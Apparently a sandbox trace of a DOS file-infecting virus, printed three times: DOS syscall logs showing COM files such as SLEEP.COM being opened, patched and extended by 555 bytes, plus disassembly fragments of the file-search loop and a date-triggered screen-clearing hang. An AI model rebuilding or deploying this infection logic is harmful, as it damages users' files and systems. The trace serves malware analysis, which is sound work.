2018-12-25T12:44:52.543466836Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.545165845Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.548678764Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.550516941Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.560568833Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.562388376Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.571587485Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.583961632Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.587709356Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.593773947Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.604888091Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.618340016Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.620764665Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.628053404Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.630712059Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.633646097Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.635918451Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.645473635Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.647309514Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.665008551Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.676693473Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.68089981Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.687226021Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.698154796Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.70561171Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.707572776Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.715189564Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.717097852Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.724790593Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.736341149Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.73906318Z 59 PC: 12e83 | Change current directory
2018-12-25T12:44:52.744419936Z 59 PC: 12e8d | Change current directory
2018-12-25T12:44:52.746584848Z 26 PC: 12f82 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15889,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:52.121379061Z 26 PC: 12f82 | Set disk transfer address
2018-12-25T12:44:52.123437317Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32c], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x348]
0x12e5b: int 0x21
0x12e5d: call 0x12f44
0x12e60: call 0x12f68
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2c9]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a6]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2df]
0x12e7f: mov ah, 0x3b
2018-12-25T12:44:52.12558124Z 71 PC: 12e5d | Get current directory
2018-12-25T12:44:52.128398393Z 42 PC: 12f48 | Get date 0x12f48: cmp al, 5
0x12f4a: je 0x12f4d
0x12f4c: ret
0x12f4d: mov ah, 1
0x12f4f: mov cx, 0x2020
0x12f52: int 0x10
0x12f54: mov ah, 2
0x12f56: xor dx, dx
0x12f58: int 0x10
0x12f5a: xor ax, ax
0x12f5c: int 0x10
0x12f5e: mov ah, 9
0x12f60: lea dx, word ptr [bp + 0x26f]
0x12f64: int 0x21
0x12f66: jmp 0x12f66
0x12f68: mov ah, 0x4e
0x12f6a: lea dx, word ptr [bp + 0x2cf]
0x12f6e: mov cx, 7
0x12f71: int 0x21
0x12f73: jae 0x12f76
2018-12-25T12:44:52.131037552Z 78 PC: 12f73 | Find first file
2018-12-25T12:44:52.137230669Z 78 PC: 12e6e | Find first file
2018-12-25T12:44:52.147703666Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T12:44:52.158060775Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T12:44:52.173243142Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:44:52.180225079Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T12:44:52.182133306Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:52.190085987Z 66 PC: 12f43 | Move file pointer
2018-12-25T12:44:52.191353523Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:52.193790239Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.198036639Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-25T12:44:52.20591327Z 87 PC: 12f2a | Get or set file date and time
2018-12-25T12:44:52.20723389Z 62 PC: 12f2e | Close file
2018-12-25T12:44:52.214974883Z 67 PC: 12f38 | Get or set file attributes
2018-12-25T12:44:52.234503412Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.240619233Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.250367708Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.263702978Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.270228145Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.287302942Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.293982456Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.295380238Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.299419536Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.301363876Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.310458193Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.321961322Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.33516647Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.348892476Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.355021519Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.362578233Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.375617089Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.380926784Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.38243804Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.389482882Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.391590708Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.394590846Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.396675883Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.404576445Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.406515834Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.413886722Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.424120828Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.427607644Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.433726036Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.443689199Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.451038902Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.453168554Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.459737122Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.462228007Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.465532268Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.46747968Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.476388893Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.478564027Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.486263487Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.498933439Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.502472716Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.508049983Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.518163412Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.526039117Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.52772334Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.533032357Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.535270854Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.53826259Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.545411833Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.562726367Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.564748071Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.573523117Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.592178913Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.595474172Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.601402672Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.612711194Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.62013203Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.621733789Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.629123143Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.631082515Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.633908165Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.636568758Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.646181961Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.64789364Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.656289646Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.666454645Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.66925361Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.675237567Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.686494588Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.693037835Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.694720572Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.701595234Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.703035011Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.705763047Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.708344151Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.716262892Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.717863805Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.726174514Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.736015559Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.738536277Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.744547842Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.755505788Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.762161066Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.764062017Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.770357331Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.771690655Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.778975436Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.786821371Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.788406105Z 59 PC: 12e83 | Change current directory
2018-12-25T12:44:52.791757965Z 59 PC: 12e8d | Change current directory
2018-12-25T12:44:52.793202027Z 26 PC: 12f82 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15889,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:52.176532069Z 26 PC: 12f82 | Set disk transfer address
2018-12-25T12:44:52.17819901Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32c], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x348]
0x12e5b: int 0x21
0x12e5d: call 0x12f44
0x12e60: call 0x12f68
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2c9]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a6]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2df]
0x12e7f: mov ah, 0x3b
2018-12-25T12:44:52.180445724Z 71 PC: 12e5d | Get current directory
2018-12-25T12:44:52.183484391Z 42 PC: 12f48 | Get date 0x12f48: cmp al, 5
0x12f4a: je 0x12f4d
0x12f4c: ret
0x12f4d: mov ah, 1
0x12f4f: mov cx, 0x2020
0x12f52: int 0x10
0x12f54: mov ah, 2
0x12f56: xor dx, dx
0x12f58: int 0x10
0x12f5a: xor ax, ax
0x12f5c: int 0x10
0x12f5e: mov ah, 9
0x12f60: lea dx, word ptr [bp + 0x26f]
0x12f64: int 0x21
0x12f66: jmp 0x12f66
0x12f68: mov ah, 0x4e
0x12f6a: lea dx, word ptr [bp + 0x2cf]
0x12f6e: mov cx, 7
0x12f71: int 0x21
0x12f73: jae 0x12f76
2018-12-25T12:44:52.186498864Z 78 PC: 12f73 | Find first file
2018-12-25T12:44:52.192443552Z 78 PC: 12e6e | Find first file
2018-12-25T12:44:52.20407567Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T12:44:52.210685127Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T12:44:52.233601252Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:44:52.240282343Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T12:44:52.24238868Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:52.253601184Z 66 PC: 12f43 | Move file pointer
2018-12-25T12:44:52.25531002Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:52.258864709Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.260794672Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-25T12:44:52.268962962Z 87 PC: 12f2a | Get or set file date and time
2018-12-25T12:44:52.271378982Z 62 PC: 12f2e | Close file
2018-12-25T12:44:52.279484531Z 67 PC: 12f38 | Get or set file attributes
2018-12-25T12:44:52.289366549Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.295724559Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.302470305Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.312060172Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.318478498Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.320575325Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.327273161Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.328715382Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.331704868Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.333265144Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.341922608Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.344520522Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.361274131Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.389140407Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.400858351Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.407452129Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.416816732Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.423723258Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.425062194Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.432475535Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.436325119Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.439194101Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.441182244Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.450319683Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.452641425Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.460615821Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.471795966Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.475577726Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.481245783Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.491304661Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.498816735Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.50051803Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.507242433Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.509654519Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.512492968Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.5149226Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.524747642Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.526219732Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.53531283Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.545615581Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.548161181Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.55385417Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.56393087Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.570503097Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.572142736Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.57866921Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.580274536Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.583114929Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.585672078Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.593414588Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.598917936Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.610402929Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.620163174Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.623159096Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.629674769Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.639494172Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.647762624Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.650154017Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.656824525Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.658433824Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.661496184Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.664081199Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.673275741Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.675046356Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.683691464Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.693585066Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.696301848Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.702491559Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.712156402Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.723461525Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.72585576Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.732668197Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.733959456Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.737185258Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.738707324Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.746465758Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.748486503Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.755976075Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.765773169Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.769025795Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.774681315Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.78427981Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.796643126Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.797988794Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.804362705Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.806797607Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.813855158Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.823604951Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.827128836Z 59 PC: 12e83 | Change current directory
2018-12-25T12:44:52.831913365Z 59 PC: 12e8d | Change current directory
2018-12-25T12:44:52.83354268Z 26 PC: 12f82 | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":15889,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:44:52.178452914Z 26 PC: 12f82 | Set disk transfer address
2018-12-25T12:44:52.17998626Z 44 PC: 12e4a | Get time 0x12e4a: cmp dh, 0
0x12e4d: je 0x12e46
0x12e4f: mov byte ptr [bp + 0x32c], dh
0x12e53: mov ah, 0x47
0x12e55: mov dl, 0
0x12e57: lea si, word ptr [bp + 0x348]
0x12e5b: int 0x21
0x12e5d: call 0x12f44
0x12e60: call 0x12f68
0x12e63: mov ah, 0x4e
0x12e65: lea dx, word ptr [bp + 0x2c9]
0x12e69: mov cx, 7
0x12e6c: int 0x21
0x12e6e: jb 0x12e7b
0x12e70: lea dx, word ptr [bp + 0x3a6]
0x12e74: call 0x12eaf
0x12e77: mov ah, 0x4f
0x12e79: jmp 0x12e6c
0x12e7b: lea dx, word ptr [bp + 0x2df]
0x12e7f: mov ah, 0x3b
2018-12-25T12:44:52.182392899Z 71 PC: 12e5d | Get current directory
2018-12-25T12:44:52.185330913Z 42 PC: 12f48 | Get date 0x12f48: cmp al, 5
0x12f4a: je 0x12f4d
0x12f4c: ret
0x12f4d: mov ah, 1
0x12f4f: mov cx, 0x2020
0x12f52: int 0x10
0x12f54: mov ah, 2
0x12f56: xor dx, dx
0x12f58: int 0x10
0x12f5a: xor ax, ax
0x12f5c: int 0x10
0x12f5e: mov ah, 9
0x12f60: lea dx, word ptr [bp + 0x26f]
0x12f64: int 0x21
0x12f66: jmp 0x12f66
0x12f68: mov ah, 0x4e
0x12f6a: lea dx, word ptr [bp + 0x2cf]
0x12f6e: mov cx, 7
0x12f71: int 0x21
0x12f73: jae 0x12f76
2018-12-25T12:44:52.188738173Z 78 PC: 12f73 | Find first file
2018-12-25T12:44:52.195926866Z 78 PC: 12e6e | Find first file
2018-12-25T12:44:52.206422105Z 67 PC: 12eb5 | Get or set file attributes
2018-12-25T12:44:52.217520063Z 67 PC: 12ec2 | Get or set file attributes
2018-12-25T12:44:52.233770488Z 61 PC: 12ec9 | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:44:52.238302667Z 87 PC: 12ed1 | Get or set file date and time
2018-12-25T12:44:52.24059086Z 63 PC: 12ee4 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:44:52.247870484Z 66 PC: 12f43 | Move file pointer
2018-12-25T12:44:52.249440845Z 64 PC: 12f15 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:44:52.252282358Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.254666406Z 64 PC: 13066 | Write file or device (Write 555 bytes on handle 5)
2018-12-25T12:44:52.261776749Z 87 PC: 12f2a | Get or set file date and time
2018-12-25T12:44:52.26348458Z 62 PC: 12f2e | Close file
2018-12-25T12:44:52.271741671Z 67 PC: 12f38 | Get or set file attributes
2018-12-25T12:44:52.280326736Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.283052705Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.29049421Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.299961661Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.306414797Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.308021995Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.314795657Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.316118608Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.318959977Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.320840976Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.326441916Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.327766804Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.334205072Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.340497965Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.342376744Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.347347776Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.360215497Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.366688455Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.36939956Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.376553795Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.378401338Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.380989287Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.382270444Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.388536196Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.390585914Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.398419122Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.408908396Z 79 PC: 12e6e | Find next file (See above)
2018-12-25T12:44:52.41210516Z 67 PC: 12eb5 | Get or set file attributes (See above)
2018-12-25T12:44:52.417824284Z 67 PC: 12ec2 | Get or set file attributes (See above)
2018-12-25T12:44:52.42837381Z 61 PC: 12ec9 | Open file (See above)
2018-12-25T12:44:52.435348462Z 87 PC: 12ed1 | Get or set file date and time (See above)
2018-12-25T12:44:52.436759688Z 63 PC: 12ee4 | Read file or device (See above)
2018-12-25T12:44:52.443088245Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.445701771Z 64 PC: 12f15 | Write file or device (See above)
2018-12-25T12:44:52.448645905Z 66 PC: 12f43 | Move file pointer (See above)
2018-12-25T12:44:52.450573495Z 64 PC: 13066 | Write file or device (See above)
2018-12-25T12:44:52.458419031Z 87 PC: 12f2a | Get or set file date and time (See above)
2018-12-25T12:44:52.459682018Z 62 PC: 12f2e | Close file (See above)
2018-12-25T12:44:52.464795268Z 67 PC: 12f38 | Get or set file attributes (See above)
2018-12-25T12:44:52.470921551Z 79 PC: 12e6e | Find next file (See above)
